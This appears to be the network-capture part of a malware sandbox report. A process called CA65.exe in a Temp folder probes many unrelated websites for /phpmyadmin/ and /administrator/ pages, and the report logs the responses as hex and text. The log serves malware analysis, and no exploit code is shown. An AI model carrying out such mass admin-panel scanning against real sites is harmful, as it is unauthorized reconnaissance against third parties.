2023-12-22 20:14:51 UTC	172	OUT	GET /phpmyadmin/ HTTP/1.1 Host: covicol.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:51 UTC	251	IN	HTTP/1.1 301 Moved Permanently Server: aruba-proxy Date: Fri, 22 Dec 2023 20:14:51 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Location: https://www.covicol.com/phpmyadmin/ X-ServerName: ipvsproxy153.ad.aruba.it
2023-12-22 20:14:51 UTC	179	IN	Data Raw: 61 38 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 61 72 75 62 61 2d 70 72 6f 78 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: a8<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>aruba-proxy</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	54418	209.182.195.165	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:51 UTC	172	OUT	GET /phpmyadmin/ HTTP/1.1 Host: shapeab.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:51 UTC	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.25.3 Date: Fri, 22 Dec 2023 20:14:51 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 315 Connection: close Vary: Accept-Encoding
2023-12-22 20:14:51 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	55032	156.38.230.76	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:51 UTC	173	OUT	GET /phpmyadmin/ HTTP/1.1 Host: omuramba.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:52 UTC	164	IN	HTTP/1.1 404 Not Found Date: Fri, 22 Dec 2023 20:14:52 GMT Server: Apache Content-Length: 259 Connection: close Content-Type: text/html; charset=iso-8859-1
2023-12-22 20:14:52 UTC	259	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 6f 6d 75 72 61 6d 62 61 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at omuramba.com Port 443</address></body></ht

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	56098	218.213.216.3	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:52 UTC	175	OUT	GET /phpmyadmin/ HTTP/1.1 Host: pcfocus.com.hk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:52 UTC	186	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 22 Dec 2023 20:14:52 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 209 Connection: close Vary: Accept-Encoding
2023-12-22 20:14:52 UTC	209	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /phpmyadmin/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	55653	183.111.174.109	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:52 UTC	173	OUT	GET /phpmyadmin/ HTTP/1.1 Host: dpikorea.org Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:52 UTC	225	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 22 Dec 2023 20:14:52 GMT Content-Type: text/html Content-Length: 1588 Connection: close Vary: Accept-Encoding Expires: Thu, 01 Jan 1970 00:00:01 GMT Cache-Control: no-cache
2023-12-22 20:14:52 UTC	1588	IN	Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 6b 6f 22 20 6c 61 6e 67 3d 22 6b 6f 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 7d 20 2e 77 72 61 70 20 7b 20 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 3b 20 74 6f 70 3a 35 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 20 6d 61 72 67 69 6e 3a 2d 31 38 35 70 78 Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ko" lang="ko"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><style type="text/css">body { width:100%; height:100%; } .wrap { position:fixed; top:50%; left:50%; margin:-185px

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	56580	104.21.52.80	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:52 UTC	164	OUT	GET / HTTP/1.1 Host: cannaclear.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:52 UTC	936	IN	HTTP/1.1 200 OK Date: Fri, 22 Dec 2023 20:14:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Access-Control-Allow-Origin: * Cache-Control: max-age=0 Expires: Fri, 22 Dec 2023 20:14:52 GMT Last-Modified: Fri, 22 Dec 2023 20:11:00 GMT Vary: X-Forwarded-Proto,Accept-Encoding,User-Agent Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rphPRIo%2Bmb%2FoAVjsvstza2v99NrfG8CbJN%2FpWqvvrYLaMXBB%2FfFsbnQm%2F2nB1NJB4EVBU81C4pkl1ZFjPKh1svg54ljlyUf4BBLmcQsi0tnK8ItfbvGmihFV219m7MoNPw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} expect-ct: max-age=86400, enforce referrer-policy: same-origin x-content-type-options: nosniff x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block Server: cloudflare CF-RAY: 839b0899aa367416-MIA alt-svc: h3=":443"; ma=86400
2023-12-22 20:14:52 UTC	433	IN	Data Raw: 64 36 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 20 63 6c 61 73 73 3d 22 6c 6f 61 64 69 6e 67 2d 73 69 74 65 20 6e 6f 2d 6a 73 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 68 74 6d 6c 29 7b 68 74 6d 6c 2e 63 6c 61 73 73 4e 61 6d 65 20 3d 20 68 74 6d 6c 2e 63 6c 61 73 73 4e 61 6d 65 2e 72 65 70 6c 61 63 65 28 2f 5c 62 6e 6f Data Ascii: d61<!DOCTYPE html><html lang="en-US" prefix="og: https://ogp.me/ns#" class="loading-site no-js"><head><meta charset="UTF-8" /><link rel="profile" href="https://gmpg.org/xfn/11" /><script>(function(html){html.className = html.className.replace(/\bno
2023-12-22 20:14:52 UTC	1369	IN	Data Raw: 20 43 61 6e 6e 61 43 6c 65 61 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 42 75 6c 6b 20 44 65 6c 74 61 2d 38 20 54 48 43 20 70 72 6f 64 75 63 74 73 20 61 74 20 75 6e 62 65 61 74 61 62 6c 65 20 70 72 69 63 65 73 2e 20 42 75 79 20 44 65 6c 74 61 20 38 20 54 48 43 20 4f 69 6c 2c 20 44 38 20 56 61 70 65 73 2c 20 48 48 43 2c 20 54 48 43 2d 4f 2c 20 48 48 43 2d 4f 20 61 6e 64 20 6f 74 68 65 72 20 63 61 6e 6e 61 62 69 6e 6f 69 64 73 20 6f 6e 6c 69 6e 65 2e 20 53 68 6f 70 20 6e 6f 77 21 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 66 6f 6c 6c 6f 77 2c 20 69 6e 64 65 78 2c 20 6d 61 78 2d 73 6e 69 70 70 65 74 3a 2d 31 2c Data Ascii: CannaClear</title><meta name="description" content="Bulk Delta-8 THC products at unbeatable prices. Buy Delta 8 THC Oil, D8 Vapes, HHC, THC-O, HHC-O and other cannabinoids online. Shop now!" /><meta name="robots" content="follow, index, max-snippet:-1,
2023-12-22 20:14:52 UTC	1369	IN	Data Raw: 64 5f 64 61 74 65 22 20 63 6f 6e 74 65 6e 74 3d 22 32 30 32 30 2d 31 31 2d 30 35 45 53 54 30 37 3a 30 34 3a 34 37 2d 30 35 3a 30 30 22 20 2f 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 79 61 3a 6f 76 73 3a 61 6c 6c 6f 77 5f 65 6d 62 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 66 61 6c 73 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 63 61 72 64 22 20 63 6f 6e 74 65 6e 74 3d 22 73 75 6d 6d 61 72 79 5f 6c 61 72 67 65 5f 69 6d 61 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 42 75 79 20 44 65 6c 74 61 20 38 20 54 48 43 20 7c 20 42 75 79 20 44 65 6c 74 61 2d 38 20 54 48 43 20 42 75 6c 6b 20 44 69 73 74 69 6c 6c 61 74 65 20 4f 6e 6c 69 6e 65 Data Ascii: d_date" content="2020-11-05EST07:04:47-05:00" /><meta property="ya:ovs:allow_embed" content="false" /><meta name="twitter:card" content="summary_large_image" /><meta name="twitter:title" content="Buy Delta 8 THC \| Buy Delta-8 THC Bulk Distillate Online
2023-12-22 20:14:52 UTC	261	IN	Data Raw: 20 69 64 3d 22 77 63 2d 61 75 74 68 6f 72 69 7a 65 2d 6e 65 74 2d 63 69 6d 2d 63 68 65 63 6b 6f 75 74 2d 62 6c 6f 63 6b 2d 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 61 6e 6e 61 63 6c 65 61 72 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 63 61 63 68 65 2f 6d 69 6e 2f 31 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 67 61 74 65 77 61 79 2d 61 75 74 68 6f 72 69 7a 65 2d 6e 65 74 2d 63 69 6d 2f 61 73 73 65 74 73 2f 63 73 73 2f 62 6c 6f 63 6b 73 2f 77 63 2d 61 75 74 68 6f 72 69 7a 65 2d 6e 65 74 2d 63 69 6d 2d 63 68 65 63 6b 6f 75 74 2d 62 6c 6f 63 6b 2e 63 73 73 3f 76 65 72 3d 31 37 30 33 30 30 31 38 31 37 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c Data Ascii: id="wc-authorize-net-cim-checkout-block-css" href="https://cannaclear.com/wp-content/cache/min/1/wp-content/plugins/woocommerce-gateway-authorize-net-cim/assets/css/blocks/wc-authorize-net-cim-checkout-block.css?ver=1703001817" type="text/css" media="all
2023-12-22 20:14:52 UTC	1369	IN	Data Raw: 34 30 36 61 0d 0a 0a 3c 6c 69 6e 6b 20 64 61 74 61 2d 6d 69 6e 69 66 79 3d 22 31 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 73 6d 61 72 74 5f 72 65 66 75 6e 64 65 72 5f 66 6f 6e 74 2d 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 61 6e 6e 61 63 6c 65 61 72 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 63 61 63 68 65 2f 6d 69 6e 2f 31 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 73 6d 61 72 74 2d 72 65 66 75 6e 64 65 72 2f 61 73 73 65 74 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2f 63 73 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 31 37 30 33 30 30 31 38 31 37 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 Data Ascii: 406a<link data-minify="1" rel="stylesheet" id="smart_refunder_font-css" href="https://cannaclear.com/wp-content/cache/min/1/wp-content/plugins/woocommerce-smart-refunder/assets/font-awesome/css/font-awesome.min.css?ver=1703001817" type="text/css" media
2023-12-22 20:14:52 UTC	1369	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 64 61 72 6b 65 72 2d 32 30 3a 23 30 30 35 61 38 37 3b 2d 2d 77 70 2d 61 64 6d 69 6e 2d 74 68 65 6d 65 2d 63 6f 6c 6f 72 2d 64 61 72 6b 65 72 2d 32 30 2d 2d 72 67 62 3a 30 2c 39 30 2c 31 33 35 3b 2d 2d 77 70 2d 61 64 6d 69 6e 2d 62 6f 72 64 65 72 2d 77 69 64 74 68 2d 66 6f 63 75 73 3a 32 70 78 3b 2d 2d 77 70 2d 62 6c 6f 63 6b 2d 73 79 6e 63 65 64 2d 63 6f 6c 6f 72 3a 23 37 61 30 30 64 66 3b 2d 2d 77 70 2d 62 6c 6f 63 6b 2d 73 79 6e 63 65 64 2d 63 6f 6c 6f 72 2d 2d 72 67 62 3a 31 32 32 2c 30 2c 32 32 33 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 3a 72 6f 6f 74 7b 2d 2d 77 70 2d 61 64 6d 69 6e 2d 62 6f 72 64 65 72 2d 77 69 64 74 68 2d 66 6f 63 75 73 3a 31 2e 35 70 78 7d 7d 2e 77 70 2d Data Ascii: -color-darker-20:#005a87;--wp-admin-theme-color-darker-20--rgb:0,90,135;--wp-admin-border-width-focus:2px;--wp-block-synced-color:#7a00df;--wp-block-synced-color--rgb:122,0,223}@media (min-resolution:192dpi){:root{--wp-admin-border-width-focus:1.5px}}.wp-
2023-12-22 20:14:52 UTC	1369	IN	Data Raw: 6f 6e 74 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6e 6f 72 6d 61 6c 29 7d 2e 68 61 73 2d 68 75 67 65 2d 66 6f 6e 74 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 68 75 67 65 29 7d 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 63 65 6e 74 65 72 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 6c 65 66 74 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 72 69 67 68 74 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 72 69 67 68 74 7d 23 65 6e 64 2d 72 65 73 69 7a 61 62 6c 65 2d 65 64 Data Ascii: ont-size{font-size:var(--wp--preset--font-size--normal)}.has-huge-font-size{font-size:var(--wp--preset--font-size--huge)}.has-text-align-center{text-align:center}.has-text-align-left{text-align:left}.has-text-align-right{text-align:right}#end-resizable-ed
2023-12-22 20:14:52 UTC	1369	IN	Data Raw: 72 64 65 72 2d 74 6f 70 2d 77 69 64 74 68 5d 29 7b 62 6f 72 64 65 72 2d 74 6f 70 2d 73 74 79 6c 65 3a 73 6f 6c 69 64 7d 68 74 6d 6c 20 3a 77 68 65 72 65 28 5b 73 74 79 6c 65 2a 3d 62 6f 72 64 65 72 2d 72 69 67 68 74 2d 77 69 64 74 68 5d 29 7b 62 6f 72 64 65 72 2d 72 69 67 68 74 2d 73 74 79 6c 65 3a 73 6f 6c 69 64 7d 68 74 6d 6c 20 3a 77 68 65 72 65 28 5b 73 74 79 6c 65 2a 3d 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 77 69 64 74 68 5d 29 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 73 74 79 6c 65 3a 73 6f 6c 69 64 7d 68 74 6d 6c 20 3a 77 68 65 72 65 28 5b 73 74 79 6c 65 2a 3d 62 6f 72 64 65 72 2d 6c 65 66 74 2d 77 69 64 74 68 5d 29 7b 62 6f 72 64 65 72 2d 6c 65 66 74 2d 73 74 79 6c 65 3a 73 6f 6c 69 64 7d 68 74 6d 6c 20 3a 77 68 65 72 65 28 69 6d 67 5b 63 Data Ascii: rder-top-width]){border-top-style:solid}html :where([style=border-right-width]){border-right-style:solid}html :where([style=border-bottom-width]){border-bottom-style:solid}html :where([style*=border-left-width]){border-left-style:solid}html :where(img[c
2023-12-22 20:14:52 UTC	1369	IN	Data Raw: 2f 63 73 73 2f 6c 77 73 5f 69 63 6f 6e 73 2e 63 73 73 3f 76 65 72 3d 31 37 30 33 30 30 31 38 31 37 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 64 61 74 61 2d 6d 69 6e 69 66 79 3d 22 31 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 77 6f 6f 72 65 77 61 72 64 73 2d 66 72 65 65 2d 70 72 6f 64 75 63 74 2d 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 61 6e 6e 61 63 6c 65 61 72 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 63 61 63 68 65 2f 6d 69 6e 2f 31 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 63 61 63 68 65 2f 6c 77 73 2f 6c 77 73 5f 77 6f 6f 72 65 77 61 72 64 73 5f 66 72 65 65 5f 70 72 6f 64 75 63 74 5f 74 65 6d 70 6c 61 74 65 2d 63 61 63 68 65 64 2e Data Ascii: /css/lws_icons.css?ver=1703001817" type="text/css" media="all" /><link data-minify="1" rel="stylesheet" id="woorewards-free-product-css" href="https://cannaclear.com/wp-content/cache/min/1/wp-content/cache/lws/lws_woorewards_free_product_template-cached.
2023-12-22 20:14:52 UTC	1369	IN	Data Raw: 6c 65 73 68 65 65 74 22 20 69 64 3d 22 73 76 2d 77 63 2d 70 61 79 6d 65 6e 74 2d 67 61 74 65 77 61 79 2d 70 61 79 6d 65 6e 74 2d 66 6f 72 6d 2d 76 35 5f 31 32 5f 30 2d 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 61 6e 6e 61 63 6c 65 61 72 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 67 61 74 65 77 61 79 2d 61 75 74 68 6f 72 69 7a 65 2d 6e 65 74 2d 63 69 6d 2f 76 65 6e 64 6f 72 2f 73 6b 79 76 65 72 67 65 2f 77 63 2d 70 6c 75 67 69 6e 2d 66 72 61 6d 65 77 6f 72 6b 2f 77 6f 6f 63 6f 6d 6d 65 72 63 65 2f 70 61 79 6d 65 6e 74 2d 67 61 74 65 77 61 79 2f 61 73 73 65 74 73 2f 63 73 73 2f 66 72 6f 6e 74 65 6e 64 2f 73 76 2d 77 63 2d 70 61 79 6d 65 6e 74 2d 67 61 74 65 77 61 79 2d 70 61 Data Ascii: lesheet" id="sv-wc-payment-gateway-payment-form-v5_12_0-css" href="https://cannaclear.com/wp-content/plugins/woocommerce-gateway-authorize-net-cim/vendor/skyverge/wc-plugin-framework/woocommerce/payment-gateway/assets/css/frontend/sv-wc-payment-gateway-pa

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	56253	50.31.65.5	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:52 UTC	180	OUT	GET /administrator/ HTTP/1.1 Host: saltdelcolom.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:53 UTC	535	IN	HTTP/1.1 404 Not Found Connection: close x-powered-by: PHP/7.3.33 expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 link: <https://saltdelcolom.com/wp-json/>; rel="https://api.w.org/" transfer-encoding: chunked date: Fri, 22 Dec 2023 20:14:53 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2023-12-22 20:14:53 UTC	833	IN	Data Raw: 31 30 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 63 61 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0d 0a 09 20 3c 74 69 74 6c 65 3e 4e 6f 20 73 26 23 38 32 31 37 3b 68 61 20 74 72 6f 62 61 74 20 6c 61 20 70 c3 a0 67 69 6e 61 20 26 23 38 32 31 31 3b 20 53 61 6c 74 20 64 Data Ascii: 10000<!DOCTYPE html><html lang="ca"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <title>No s’ha trobat la pgina – Salt d
